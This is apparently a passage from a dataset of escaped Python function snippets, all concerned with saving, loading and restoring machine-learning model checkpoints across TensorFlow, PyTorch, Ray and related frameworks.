start_step = Pickle.load(open(step_file, 'rb'))\n for step in xrange(start_step, self.train_size // self.train_batch_size):\n print 'Step No.:', step\n # Checkpoint tensorflow variables for recovery\n if step % self.checkpointer.get_checkpoint_steps() == 0:\n print 'Checkpointing: Saving Tensorflow variables'\n self.saver.save(self.sess, self.checkpointer.get_save_address())\n Pickle.dump(step + 1, open(step_file, 'wb'))\n print 'Checkpointing Complete. Deleting historical checkpoints....'\n self.checkpointer.delete_previous_checkpoints(num_previous=2)\n print 'Deleted.. Moving forward...'\n\n offset = (step * self.train_batch_size) % self.train_size\n batch_data_fwd = self.X_trn_fwd[offset:(offset + self.train_batch_size), :].T\n batch_data_bwd = self.X_trn_bwd[offset:(offset + self.train_batch_size), :].T\n batch_labels = self.Y_trn[offset:(offset + self.train_batch_size), :].T\n\n loss_t_forward, loss_t_backward = self._train_batch(batch_data_fwd, batch_data_bwd, batch_labels)\n print \"Present Loss Forward:\", loss_t_forward\n print \"Present Loss Backward:\", loss_t_backward\n\n # check results on 2 tasks - Visual Validation\n print 'Train Data Validation\\n'\n self._visual_validate(self.X_trn_fwd[301, :], self.X_trn_bwd[301, :], self.Y_trn[301, :])\n print\n print\n print 'Test Data Validation\\n'\n self._visual_validate(self.X_tst_fwd[56, :], self.X_tst_bwd[56, :], self.Y_tst[56, :])\n print\n print\n\n # Store prediction after certain number of steps #############\n # This will be useful for the graph construction\n '''\n if(step % self.checkpointer.get_prediction_checkpoint_steps() == 0):\n self.predict()\n self.store_test_predictions('_' + str(step))\n '''", "def previous_saves(self):\n if os.path.exists(self.results_dir):\n return sorted([x for x in Path(self.results_dir).glob(f'{self.model_name}checkpoint_*.pk')], key=lambda s: int(s.name.replace(f'{self.model_name}checkpoint_', '').replace('.pk', '')))\n else:\n return []", "def load_training_checkpoint(args, model, PATH, ckpt_id):\r\n logger = args.logger\r\n _, checkpoint_state_dict = model.network.load_checkpoint(PATH, ckpt_id)\r\n epoch = checkpoint_state_dict['epoch']\r\n last_global_step = checkpoint_state_dict['last_global_step']\r\n last_global_data_samples = checkpoint_state_dict[\r\n 'last_global_data_samples']\r\n del checkpoint_state_dict\r\n return (epoch, last_global_step, last_global_data_samples)", "def load_checkpoints(args, model): \n print('Loading the model checkpoints from iter {}...'.format(args.resume_iter))\n checkpoint_path = os.path.join(config.checkpoint_path, args.model_type)\n\n gen_g_path = os.path.join(checkpoint_path, '{}-Gen_g.ckpt'.format(args.resume_iter))\n gen_f_path = os.path.join(checkpoint_path, '{}-Gen_f.ckpt'.format(args.resume_iter))\n model.gen_g.load_state_dict(torch.load(gen_g_path, map_location=lambda storage, loc: storage))\n model.gen_f.load_state_dict(torch.load(gen_f_path, map_location=lambda storage, loc: storage))\n\n if args.train:\n dis_c_path = os.path.join(checkpoint_path, '{}-Dis_c.ckpt'.format(args.resume_iter))\n dis_t_path = os.path.join(checkpoint_path, '{}-Dis_t.ckpt'.format(args.resume_iter))\n model.dis_c.load_state_dict(torch.load(dis_c_path, map_location=lambda storage, loc: storage))\n model.dis_t.load_state_dict(torch.load(dis_t_path, map_location=lambda storage, loc: storage))", "def test_checkpoints(self):\r\n\r\n self.tmpdir = mkdtemp(dir=\"./\",\r\n suffix=\"_test_checkpoints/\")\r\n\r\n bestscores = dict({1: 0.9,\r\n 2: 1.1,\r\n 3: 2.3,\r\n 4: 99.93232344})\r\n\r\n out_fp = write_checkpoint(\r\n \"Key\", 99, self.mapping, [1, 2, 3, 4], bestscores,\r\n [2, 1, 3, 4],\r\n self.tmpdir)\r\n\r\n observed = read_checkpoint(out_fp)\r\n\r\n self.assertEqual(observed[0], \"Key\")\r\n self.assertEqual(observed[1], 99)\r\n self.assertEqual(observed[2], self.mapping)\r\n self.assertEqual(observed[3], [1, 2, 3, 4])\r\n self.assertEqual(observed[4], bestscores)\r\n self.assertEqual(observed[5], [2, 1, 3, 4])", "def testCheckpointContinuationValidity(self):\n\n # Train once, get checkpoint via callback returns\n res_1 = {}\n bst_1 = train(\n self.params,\n RayDMatrix(self.x, self.y),\n callbacks=[\n _checkpoint_callback(frequency=1, before_iteration_=False)\n ],\n num_boost_round=2,\n ray_params=RayParams(num_actors=2),\n additional_results=res_1)\n last_checkpoint_1 = res_1[\"callback_returns\"][0][-1]\n last_checkpoint_other_rank_1 = res_1[\"callback_returns\"][1][-1]\n\n # Sanity check\n lc1 = xgb.Booster()\n lc1.load_model(last_checkpoint_1)\n self.assertEqual(last_checkpoint_1, last_checkpoint_other_rank_1)\n self.assertEqual(last_checkpoint_1, lc1.save_raw())\n self.assertEqual(bst_1.get_dump(), lc1.get_dump())\n\n # Start new training run, starting from existing model\n res_2 = {}\n bst_2 = train(\n self.params,\n RayDMatrix(self.x, self.y),\n callbacks=[\n _checkpoint_callback(frequency=1, before_iteration_=True),\n _checkpoint_callback(frequency=1, before_iteration_=False)\n ],\n num_boost_round=4,\n ray_params=RayParams(num_actors=2),\n additional_results=res_2,\n xgb_model=lc1)\n first_checkpoint_2 = res_2[\"callback_returns\"][0][0]\n first_checkpoint_other_actor_2 = res_2[\"callback_returns\"][1][0]\n last_checkpoint_2 = res_2[\"callback_returns\"][0][-1]\n last_checkpoint_other_actor_2 = res_2[\"callback_returns\"][1][-1]\n\n fcp_bst = xgb.Booster()\n fcp_bst.load_model(first_checkpoint_2)\n\n lcp_bst = xgb.Booster()\n lcp_bst.load_model(last_checkpoint_2)\n\n # Sanity check\n self.assertEqual(first_checkpoint_2, first_checkpoint_other_actor_2)\n self.assertEqual(last_checkpoint_2, last_checkpoint_other_actor_2)\n self.assertEqual(bst_2.get_dump(), lcp_bst.get_dump())\n\n # Training should not have proceeded for the first checkpoint,\n # so trees should be equal\n self.assertEqual(lc1.get_dump(), fcp_bst.get_dump())\n\n # Training should have proceeded for the last checkpoint,\n # so trees should not be equal\n self.assertNotEqual(fcp_bst.get_dump(), lcp_bst.get_dump())", "async def checkpoint(cls) -> None:", "def train(stop_criteria, save_dir):\n analysis = ray.tune.run(ppo.PPOTrainer, config=config, local_dir=save_dir, stop=stop_criteria,\n checkpoint_at_end=True)\n # list of lists: one list per checkpoint; each checkpoint list contains 1st the path, 2nd the metric value\n trial = analysis.get_best_trial('episode_reward_mean', 'max', 'all', True)\n checkpoints = analysis.get_trial_checkpoints_paths(trial=trial, metric='episode_reward_mean')\n # retrieve the checkpoint path; we only have a single checkpoint, so take the first one\n checkpoint_path = checkpoints[0][0]\n return checkpoint_path, analysis", "def _restore_training_state(self, restore_state):\n self.load_state_dict(restore_state[\"model\"])\n self.optimizer.load_state_dict(restore_state[\"optimizer\"])\n self.lr_scheduler.load_state_dict(restore_state[\"lr_scheduler\"])\n start_iteration = restore_state[\"iteration\"] + 1\n if self.config[\"verbose\"]:\n print(f\"Restored checkpoint to iteration {start_iteration}.\")\n\n if restore_state[\"best_model_found\"]:\n # Update checkpointer with appropriate information about best model\n # Note that the best model found so far may not be the model in the\n # checkpoint that is currently being loaded.\n self.checkpointer.best_model_found = True\n self.checkpointer.best_iteration = restore_state[\"best_iteration\"]\n self.checkpointer.best_score = restore_state[\"best_score\"]\n if self.config[\"verbose\"]:\n print(\n f\"Updated checkpointer: \"\n f\"best_score={self.checkpointer.best_score:.3f}, \"\n f\"best_iteration={self.checkpointer.best_iteration}\"\n )\n return start_iteration", "def _get_checkpoint(self):\n ckpt = tf.train.get_checkpoint_state(self.model)\n if ckpt and ckpt.model_checkpoint_path:\n ckpt_path = ckpt.model_checkpoint_path\n else:\n raise RuntimeError('No checkpoint file found')\n return ckpt_path", "def __call__(self, save_fct):\n eval_scores = [\"Not evaluated\"]\n if self.train:\n logger.info(\"> Training\")\n self.train.run_training(save_fct = save_fct)\n logger.info('reverting learned weights to best checkpoint..')\n try:\n ParamManager.param_col.revert_to_best_model()\n except RevertingUnsavedModelException:\n pass\n\n evaluate_args = self.evaluate\n if evaluate_args:\n logger.info(\"> Performing final evaluation\")\n eval_scores = []\n for evaluator in evaluate_args:\n eval_score = evaluator.eval()\n if type(eval_score) == list:\n eval_scores.extend(eval_score)\n else:\n eval_scores.append(eval_score)\n\n return eval_scores", "def next_checkpoint_index(self):\n return self._next_checkpoint", "def checkpoint(self):\n save()", "def checkpoint(self):\n checkpoint_status = self.load.checkpoint()\n if checkpoint_status >= TD_ERROR:\n status_message = MESSAGES.get(int(checkpoint_status), None)\n error_table = [(\"Error Code\", \"Error Description\")]\n error_table.append((checkpoint_status, status_message))\n log.info(\"\\r{}\".format(format_table(error_table)))\n return checkpoint_status", "def save_checkpoint(self):\n if not self.save_ckpt:\n return\n\n lookup = None\n is_best = False\n checkpoint = self.create_checkpoint()\n\n # save best only or not?\n if self.save_best_only:\n if self.valid_dataloader:\n for item in [self.valid_metric_meters, self.valid_loss_meters]:\n if self.primary_indicator in item:\n lookup = item\n else:\n for item in [self.train_metric_meters, self.train_loss_meters]:\n if self.primary_indicator in item:\n lookup = item\n if lookup:\n value = lookup[self.primary_indicator].avg\n if self.best_mode == 'min':\n if value < self.best_indicator:\n self.best_indicator = value\n is_best = True\n else:\n if value > self.best_indicator:\n self.best_indicator = value\n is_best = True\n\n # TODO: better naming convention\n if self.valid_dataloader:\n metric_string = '-'.join([\n f'{metric}-[{self.valid_metric_meters[metric].avg:.5f}]'\n for metric in self.valid_metric_meters\n ])\n loss_string = '-'.join([\n f'{loss}-[{self.valid_loss_meters[loss].avg:.5f}]'\n for loss in self.valid_loss_meters\n ])\n else:\n metric_string = '-'.join([\n f'{metric}-[{self.train_metric_meters[metric].avg:.5f}]'\n for metric in self.train_metric_meters\n ])\n loss_string = '-'.join([\n f'{loss}-[{self.train_loss_meters[loss].avg:.5f}]'\n for loss in self.train_loss_meters\n ])\n # TODO: use config for paths\n # make subdir\n folder = Path(self.save_path, str(self.fold_idx))\n folder.mkdir(parents=True, exist_ok=True)\n if not self.save_best_only or (self.save_best_only and is_best):\n torch.save(checkpoint,\n f'{folder}/ep-[{self.epoch}]-iter-[{self.iter}]-{loss_string}-{metric_string}.pth')", "def get_ckpt_list(self,\n ckpt_type):\n if ckpt_type == \"debug\":\n ckpt_state = tf.train.get_checkpoint_state(self.ckpt_debug_dir)\n if ckpt_state is None:\n raise FileNotFoundError(\"checkpoint files doesn't exist\")\n \n return ckpt_state.all_model_checkpoint_paths\n elif ckpt_type == \"epoch\":\n ckpt_state = tf.train.get_checkpoint_state(self.ckpt_epoch_dir)\n if ckpt_state is None:\n raise FileNotFoundError(\"checkpoint files doesn't exist\")\n \n return ckpt_state.all_model_checkpoint_paths\n else:\n raise ValueError(\"unsupported checkpoint type {0}\".format(ckpt_type))", "def load_checkpoint(self):\n if self.params.resume_from is not None and os.path.exists(self.params.resume_from):\n try:\n LOG('Loading Checkpoint at %s' % self.params.resume_from)\n ckpt = torch.load(self.params.resume_from)\n self.epoch = ckpt['epoch']\n try:\n self.train_loss = ckpt['train_loss']\n self.val_loss = ckpt['val_loss']\n except:\n self.train_loss = []\n self.val_loss = []\n self.network.load_state_dict(ckpt['state_dict'])\n self.opt.load_state_dict(ckpt['optimizer'])\n LOG('Checkpoint Loaded!')\n LOG('Current Epoch: %d' % self.epoch)\n self.ckpt_flag = True\n except:\n WARNING('Cannot load checkpoint from %s. Start loading pre-trained model......' % self.params.resume_from)\n else:\n WARNING('Checkpoint do not exists. Start loading pre-trained model......')", "def _find_last_checkpoint(self):\n highest_num, last_checkpoint = -np.inf, None\n for filename in os.listdir(self.logdir):\n # checkpoints look like logdir/model.ckpt-N\n # self._save_path is \"logdir/model.ckpt\"\n if os.path.basename(self._save_path) in filename:\n try:\n N = int(filename.split(\"-\")[1].split(\".\")[0])\n if N > highest_num:\n highest_num = N\n last_checkpoint = \"model.ckpt-\" + str(N)\n except ValueError:\n pass\n return os.path.join(self.logdir, last_checkpoint)", "async def checkpoint() -> None:\n await get_async_backend().checkpoint()", "def get_checkpoint_list_by_date(cls, date):\n return cls.create_checkpoint_list_by_date(date)", "def _restore_models_and_step(self):\n global_step_D = global_step_G = 0\n\n if self.netD_ckpt_file:\n assert os.path.exists(self.netD_ckpt_file)\n print(\"INFO: Restoring checkpoint for D...\")\n global_step_D = self.netD.restore_checkpoint(\n ckpt_file=self.netD_ckpt_file, optimizer=self.optD)\n\n if self.netG_ckpt_file:\n assert os.path.exists(self.netG_ckpt_file)\n print(\"INFO: Restoring checkpoint for G...\")\n global_step_G = self.netG.restore_checkpoint(\n ckpt_file=self.netG_ckpt_file, optimizer=self.optG)\n\n if self.train_drs and self.netD_drs_ckpt_file:\n assert os.path.exists(self.netD_drs_ckpt_file)\n print(\"INFO: Restoring checkpoint for D_drs...\")\n global_step_D = self.netD_drs.restore_checkpoint(\n ckpt_file=self.netD_drs_ckpt_file, optimizer=self.optD_drs)\n\n if global_step_D != global_step_G:\n print(f'WARN: global_step_D {global_step_D} != global_step_G {global_step_G}, use global_step_G')\n global_step = global_step_G # Restores global step\n\n return global_step", "def checkpoint(self, epoch: int):\n if self.exp.scheduler_stepper is not None:\n torch.save(\n {\n \"model_state_dict\": self.exp.model.state_dict(),\n \"optimizer_state_dict\": self.exp.optimizer.state_dict(),\n \"scheduler_state_dict\": self.exp.scheduler_stepper.scheduler.state_dict(),\n \"Epoch\": epoch,\n },\n self.exp.path,\n )\n else:\n torch.save(\n {\n \"model_state_dict\": self.exp.model.state_dict(),\n \"optimizer_state_dict\": self.exp.optimizer.state_dict(),\n \"Epoch\": epoch,\n },\n self.exp.path,\n )", "def load_checkpoint_train(cpdir, model, optimizer):\n start_epoch = 0\n start_global_step = 0\n if cpdir is not None:\n start_global_step, start_epoch = load_checkpoint(\n cpdir, model, optimizer)\n start_global_step += 1\n start_epoch += 1\n return start_global_step, start_epoch", "def finetuning_callbacks(checkpoint_path, patience, verbose):\n cb_verbose = (verbose >= 2)\n checkpointer = ModelCheckpoint(monitor='val_loss', filepath=checkpoint_path,\n save_best_only=True, verbose=cb_verbose)\n earlystop = EarlyStopping(monitor='val_loss', patience=patience,\n verbose=cb_verbose)\n return [checkpointer, earlystop]", "def reload_checkpoint_if_exists(sess, saver, train_writer, validation_writer, test_writer):\n global_step = -1\n if FLAGS.continue_run:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n # Restores from checkpoint\n saver.restore(sess, ckpt.model_checkpoint_path)\n # extract global_step from it.\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1])\n print(\"checkpoint found at step %d\", global_step)\n # ensure that the writers ignore saved summaries that occurred after the last checkpoint but before a crash\n train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)\n validation_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)\n test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)\n else:\n print('No checkpoint file found')\n return global_step", "def get_overall_checkpoint_by_date(cls, date):\n return cls.create_overall_checkpoint_by_date(date)", "def load_checkpoint(checkpoint_dir, epoch, iteration):\n path = opj(checkpoint_dir, str(epoch) + '.' + str(iteration) + '.ckpt')\n if not os.path.isfile(path):\n raise Exception(\"Checkpoint in epoch %d doesn't exist :sob:\" % epoch)\n\n checkpoint = torch.load(path)\n start_epoch = checkpoint['epoch']\n state_dict = checkpoint['state_dict']\n start_iteration = checkpoint['iteration']\n\n assert iteration == start_iteration\n return start_epoch, start_iteration, state_dict", "def _get_callbacks(self):\n csv_logger = CSVLogger(self.model.FIT_HISTORY_PATH, append=False, separator=';')\n checkpoint = ModelCheckpoint(self.model.WEIGHT_PATH,\n monitor='val_loss',\n verbose=1,\n save_best_only=True,\n mode='min',\n save_weights_only=True)\n\n reduceLROnPlat = ReduceLROnPlateau(monitor='val_loss',\n factor=0.2,\n patience=1,\n verbose=1,\n mode='min',\n min_delta=0.0001,\n cooldown=0,\n min_lr=1e-10)\n\n early = EarlyStopping(monitor=\"val_loss\", mode=\"min\", verbose=2, patience=5, min_delta=0.0001)\n tb = TensorBoard(log_dir=\"./Graph\", write_grads=True,\n histogram_freq=1, write_images=True)\n return [checkpoint, early, reduceLROnPlat, csv_logger]", "def load_checkpoint(args, trainer, epoch_itr):\n os.makedirs(os.path.join(args.save_dir, 'checkpoints'), exist_ok=True)\n checkpoint_path = os.path.join(args.save_dir, 'checkpoints', args.restore_file)\n if os.path.isfile(checkpoint_path):\n extra_state = trainer.load_checkpoint(checkpoint_path)\n if extra_state is not None:\n # replay train iterator to match checkpoint\n epoch_itr.load_state_dict(extra_state['train_iterator'])\n\n print('| loaded checkpoint {} (epoch {} @ {} updates)'.format(\n checkpoint_path, epoch_itr.epoch, trainer.get_num_updates()))\n\n trainer.lr_step(epoch_itr.epoch)\n trainer.lr_step_update(trainer.get_num_updates())\n if 'best' in extra_state:\n save_checkpoint.best = extra_state['best']", "def load_latest(self):\n all_checkpoints = self.sorted_checkpoints()\n\n extras = None\n meta = None\n for f in all_checkpoints:\n try:\n extras, meta = self.load(f)\n return extras, meta\n except Exception as e:\n log.debug(\n \"Could not load checkpoint \\\"{}\\\", moving on ({}).\".format(f, e))\n log.debug(\"No checkpoint found to load.\")\n return extras, meta", "def list_checkpoints(self, name, path=''):\n\t\tself.log.debug(\"listing checkpoint %s %s\", path, name)\n\t\tcheckpoint_id = \"checkpoint\"\n\t\tos_path = self.get_checkpoint_path(checkpoint_id, name, path)\n\t\tif not key_exists(self.bucket, os_path):\n\t\t\treturn []\n\t\telse:\n\t\t\treturn [self.get_checkpoint_model(checkpoint_id, name, path)]", "def checkpoint(func, inputs, params, flag):\n return func(*inputs)", "def load_all(self):\r\n iteration_number = 0\r\n iteration_numbers = []\r\n for prefix, saver in self._savers.items():\r\n output_path = '%s/checkpoints/%s' % (self._model.output_path, prefix)\r\n checkpoint = tf.train.get_checkpoint_state(output_path)\r\n if checkpoint and checkpoint.model_checkpoint_path:\r\n checkpoint_name = os.path.basename(checkpoint.model_checkpoint_path)\r\n try: # Attempt to restore saveable variables\r\n self._savers[prefix].restore(self._tensorflow_session,\r\n '%s/%s' % (output_path, checkpoint_name))\r\n iteration_numbers.append(\r\n int(next(re.finditer(\"(\\d+)(?!.*\\d)\", checkpoint_name)).group(0))\r\n )\r\n except Exception as e:\r\n import traceback\r\n traceback.print_exc()\r\n if len(iteration_numbers) > 0:\r\n iteration_number = np.amax(iteration_numbers)\r\n return iteration_number", "def _init_checkpoint_and_variables(pretrain_checkpoint_path,\n pretrain_checkpoint_exclude_scopes):\n checkpoint_reader = tf.contrib.framework.load_checkpoint(\n pretrain_checkpoint_path)\n return get_variables_to_restore_from_pretrain_checkpoint(\n pretrain_checkpoint_exclude_scopes,\n checkpoint_reader.get_variable_to_shape_map())", "def warm_start_training(self, sess): \n ckpt = tf.train.latest_checkpoint(self.train_dir)\n if ckpt:\n # the global_step will restore sa well\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=100)\n saver.restore(sess, ckpt)\n print('restore from the checkpoint{0}'.format(ckpt))\n return\n \n if self.checkpoint_path is None:\n return None\n \n exclusions = []\n if self.checkpoint_exclude_scopes:\n exclusions = [scope.strip()\n for scope in self.checkpoint_exclude_scopes.split(',')]\n # TODO(sguada) variables.filter_variables()\n variables_to_restore = []\n all_variables = slim.get_model_variables()\n if tf.gfile.IsDirectory(self.checkpoint_path):\n global_step = slim.get_or_create_global_step()\n all_variables.append(global_step)\n checkpoint_path = tf.train.latest_checkpoint(self.checkpoint_path)\n else:\n checkpoint_path = self.checkpoint_path\n \n for var in all_variables:\n excluded = False\n \n for exclusion in exclusions:\n if var.op.name.startswith(exclusion):\n excluded = True\n break\n if not excluded:\n variables_to_restore.append(var)\n \n# tf.logging.info('Fine-tuning from %s' % checkpoint_path)\n \n slim.assign_from_checkpoint_fn(\n checkpoint_path,\n variables_to_restore)(sess)\n return", "def save_checkpoint(self, checkpoint: str) -> str:\n\n # Some model might need to aggregate variables during checkpointing\n # which requires both the chief and workers to participate in the\n # allreduce communication protocol.\n # So we need to call get_state on every remote workers, otherwise\n # it might get stuck\n state_refs = [w.get_state.remote() for w in self.remote_workers]\n\n state = ray.get(state_refs[0])\n\n with open(checkpoint, \"wb\") as f:\n SafePickle.dump(state, f)\n\n return checkpoint", "def load_ckpt(saver, sess, ckpt_dir=\"train\"):\n while True:\n try:\n latest_filename = \"checkpoint_best\" if ckpt_dir==\"eval\" else None\n ckpt_dir = os.path.join(FLAGS.log_root, ckpt_dir)\n ckpt_state = tf.train.get_checkpoint_state(ckpt_dir, latest_filename=latest_filename)\n tf.logging.info('Loading checkpoint %s', ckpt_state.model_checkpoint_path)\n saver.restore(sess, ckpt_state.model_checkpoint_path)\n return ckpt_state.model_checkpoint_path\n except:\n tf.logging.info(\"Failed to load checkpoint from %s. Sleeping for %i secs...\", ckpt_dir, 10)\n time.sleep(10)", "def create_checkpoint_machinery(self):\n # Create checkpoint instance.\n checkpoint_dir = os.path.join(\n self.params[\"output_dir\"], \"checkpoints\"\n )\n checkpoint_prefix = os.path.join(checkpoint_dir, \"ckpt\")\n\n checkpoint = tf.train.Checkpoint(\n generator_model=(\n self.network_objects[\"generator\"].models[self.num_growths - 1]\n ),\n discriminator_model=(\n self.network_objects[\"discriminator\"].models[self.num_growths - 1]\n ),\n generator_optimizer=self.optimizers[\"generator\"],\n discriminator_optimizer=self.optimizers[\"discriminator\"]\n )\n\n # Create checkpoint manager.\n self.checkpoint_manager = tf.train.CheckpointManager(\n checkpoint=checkpoint,\n directory=checkpoint_dir,\n max_to_keep=self.params[\"keep_checkpoint_max\"],\n step_counter=self.global_step,\n checkpoint_interval=self.params[\"save_checkpoints_steps\"]\n )\n\n # Restore any prior checkpoints.\n status = checkpoint.restore(\n save_path=self.checkpoint_manager.latest_checkpoint\n )", "def evaluate():\n tf.compat.v1.enable_eager_execution()\n\n candidate_checkpoint = None\n uflow = uflow_main.create_uflow()\n evaluate_fn, _ = uflow_data.make_eval_function(\n FLAGS.eval_on,\n FLAGS.height,\n FLAGS.width,\n progress_bar=True,\n plot_dir=FLAGS.plot_dir,\n num_plots=50)\n\n latest_checkpoint = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n while 1:\n # Wait for a new checkpoint\n while candidate_checkpoint == latest_checkpoint:\n logging.log_every_n(logging.INFO,\n 'Waiting for a new checkpoint, at %s, latest is %s',\n 20, FLAGS.checkpoint_dir, latest_checkpoint)\n time.sleep(0.5)\n candidate_checkpoint = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n candidate_checkpoint = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n latest_checkpoint = candidate_checkpoint\n logging.info('New checkpoint found: %s', candidate_checkpoint)\n # This forces the checkpoint manager to reexamine the checkpoint directory\n # and become aware of the new checkpoint.\n uflow.update_checkpoint_dir(FLAGS.checkpoint_dir)\n uflow.restore()\n eval_results = evaluate_fn(uflow)\n uflow_plotting.print_eval(eval_results)\n step = tf.compat.v1.train.get_global_step().numpy()\n if step >= FLAGS.num_train_steps:\n logging.info('Evaluator terminating - completed evaluation of checkpoint '\n 'from step %d', step)\n return", "def get_checkpoint(model, checkpoint='-1'):\n if not os.path.isfile(os.path.join(model, \"checkpoint\")):\n sys.exit(\"[ERROR] Cannot find checkpoint in %s.\" % model)\n ckpt = tf.train.get_checkpoint_state(model)\n\n model_checkpoint_path = ckpt.model_checkpoint_path\n all_model_checkpoint_paths = ckpt.all_model_checkpoint_paths\n\n if not ckpt or not model_checkpoint_path:\n sys.exit(\"[ERROR] Cannot read checkpoint %s.\" % os.path.join(model, \"checkpoint\"))\n\n steps = [int(c.rsplit('-', 1)[1]) for c in all_model_checkpoint_paths]\n steps = sorted(steps)\n if checkpoint == \"last\":\n tf.logging.info(\"Load the last saved model.\")\n checkpoint = steps[-1]\n else:\n checkpoint = int(checkpoint)\n if checkpoint == -1:\n tf.logging.info(\"Load the best model according to valid_loss\")\n min_epoch = -1\n min_loss = 1e10\n with open(os.path.join(model, \"valid_loss\")) as f:\n for line in f.readlines():\n epoch, loss, eer = line.split(\" \")\n epoch = int(epoch)\n loss = float(loss)\n if loss < min_loss:\n min_loss = loss\n min_epoch = epoch\n # Add 1 to min_epoch since epoch is 0-based\n config_json = os.path.join(model, \"config.json\")\n params = Params(config_json)\n checkpoint = (min_epoch + 1) * params.num_steps_per_epoch\n tf.logging.info(\"The checkpoint is %d\" % checkpoint)\n assert checkpoint in steps, \"The checkpoint %d not in the model directory\" % checkpoint\n\n model_checkpoint_path = model_checkpoint_path.rsplit(\"-\", 1)[0] + \"-\" + str(checkpoint)\n model_checkpoint_path = os.path.join(model, os.path.basename(model_checkpoint_path))\n\n with open(os.path.join(model, \"checkpoint\"), \"w\") as f:\n f.write(\"model_checkpoint_path: \\\"%s\\\"\\n\" % model_checkpoint_path)\n for checkpoint in all_model_checkpoint_paths:\n checkpoint_new = os.path.join(model, os.path.basename(checkpoint))\n f.write(\"all_model_checkpoint_paths: \\\"%s\\\"\\n\" % checkpoint_new)\n return model_checkpoint_path", "def load_checkpoint(self, filename):\n results = Future.gen_list([\n self.call_async(rank, '_async_load_checkpoint', filename=filename)\n for rank in range(self.num_replicas)\n ])\n extra_state = results[0]\n return extra_state", "def checkpoint(self):\n self.logger.info('Checkpointing Sampler')\n with open(self.resume_file, \"wb\") as f:\n pickle.dump(self, f)", "def save_states(self, checkpoint):\n raise NotImplementedError()", "def find_checkpoint(load_dir, seen_step):\n ckpt = tf.train.get_checkpoint_state(load_dir)\n if ckpt and ckpt.model_checkpoint_path:\n global_step = extract_step(ckpt.model_checkpoint_path)\n if int(global_step) != seen_step:\n return int(global_step), ckpt.model_checkpoint_path\n return -1, None", "def load_ckpt(saver, sess, ckpt_dir=\"train\"):\n while True:\n try:\n latest_filename = \"checkpoint_best\" if ckpt_dir == \"eval\" else None\n ckpt_dir = os.path.join(FLAGS.log_root, ckpt_dir)\n ckpt_state = tf.train.get_checkpoint_state(ckpt_dir, latest_filename=latest_filename)\n tf.logging.info('Loading checkpoint %s', ckpt_state.model_checkpoint_path)\n saver.restore(sess, ckpt_state.model_checkpoint_path)\n return ckpt_state.model_checkpoint_path\n except:\n tf.logging.info(\"Failed to load checkpoint from %s. Sleeping for %i secs...\", ckpt_dir, 10)\n time.sleep(10)", "def SelectTrainingCheckpoint(\n log_dir: Path,\n) -> Tuple[epoch_pb2.Epoch, checkpoint_pb2.Checkpoint]:\n epoch_num = -1\n for path in (log_dir / \"epochs\").iterdir():\n if path.name.endswith(\".EpochList.pbtxt\"):\n epoch = pbutil.FromFile(path, epoch_pb2.EpochList())\n if not epoch.epoch[0].train_results.graph_count:\n continue\n epoch_num = max(epoch_num, epoch.epoch[0].epoch_num)\n\n epoch = pbutil.FromFile(\n log_dir / \"epochs\" / f\"{epoch_num:03d}.EpochList.pbtxt\",\n epoch_pb2.EpochList(),\n )\n checkpoint = pbutil.FromFile(\n log_dir / \"checkpoints\" / f\"{epoch_num:03d}.Checkpoint.pb\",\n checkpoint_pb2.Checkpoint(),\n )\n logging.info(\n \"Resuming training from checkpoint %d with val F1 score %.3f\",\n epoch.epoch[0].epoch_num,\n epoch.epoch[0].val_results.mean_f1,\n )\n return epoch.epoch[0], checkpoint", "def getCheckpointList(self, irace):\n\t\tr = []\n\t\tif irace >= len(self.races):\n\t\t\treturn r # new race\n#\t\t\tmsg = \"Toolkit Error: trying to get a checkpoint from race that doesn't exists (bad index %d, actual length %d \" % (irace, len(self.races))\n#\t\t\traise showedError(msg)\n\t\ttherace = self.races[irace]\n\t\tif len(therace.points) > 0:\n\t\t\tfor i in range(len(therace.points)):\n\t\t\t\tline = \" %.3d - %s \" % (i, therace.points[i]['gate'])\n\t\t\t\tr.append(line)\n\t\t\tself.raceIndex = irace\n\t\t\ttherace.showCheckpoints(True)\n\t\treturn r", "def setup_checkpoint(self, base_model, classifier, setops_model, evaluator):\r\n\r\n checkpoint_handler_acc = ModelCheckpoint(\r\n self.results_path,\r\n CKPT_PREFIX,\r\n score_function=lambda eng: round(\r\n (eng.state.metrics[\"fake class acc\"] + eng.state.metrics[\"S class acc\"] +\r\n eng.state.metrics[\"I class acc\"] + eng.state.metrics[\"U class acc\"]) / 4,\r\n 3\r\n ),\r\n score_name=\"val_acc\",\r\n n_saved=2,\r\n require_empty=False\r\n )\r\n checkpoint_handler_last = ModelCheckpoint(\r\n self.results_path,\r\n CKPT_PREFIX,\r\n save_interval=2,\r\n n_saved=2,\r\n require_empty=False\r\n )\r\n evaluator.add_event_handler(\r\n event_name=Events.EPOCH_COMPLETED,\r\n handler=checkpoint_handler_acc,\r\n to_save={\r\n 'base_model': base_model.state_dict(),\r\n 'classifier': classifier.state_dict(),\r\n 'setops_model': setops_model.state_dict(),\r\n }\r\n )\r\n evaluator.add_event_handler(\r\n event_name=Events.EPOCH_COMPLETED,\r\n handler=checkpoint_handler_last,\r\n to_save={\r\n 'base_model': base_model.state_dict(),\r\n 'classifier': classifier.state_dict(),\r\n 'setops_model': setops_model.state_dict(),\r\n }\r\n )", "def load_checkpoint(self, model, optimizers):\n self.epoch = get_last_epoch(self.log_path)\n\n model_state_dict = torch.load(os.path.join(self.log_path, 'checkpoints', str(self.epoch), 'model.ckpt'))\n model.load_state_dict(model_state_dict)\n\n optimizer_state_dict = torch.load(os.path.join(self.log_path, 'checkpoints', str(self.epoch), 'opt.ckpt'))\n for opt_ind in range(len(optimizers)):\n optimizers[opt_ind].opt.load_state_dict(optimizer_state_dict[opt_ind])\n optimizers[opt_ind].opt.state = set_gpu_recursive(optimizers[opt_ind].opt.state, torch.cuda.current_device())\n\n schedulers = load_sched(optimizers, self.epoch)\n\n return model, optimizers, schedulers", "def checkpoint(self, timestamp=0.0, **keywords):\n self.services.debug('checkpoint() method called')\n pass", "def 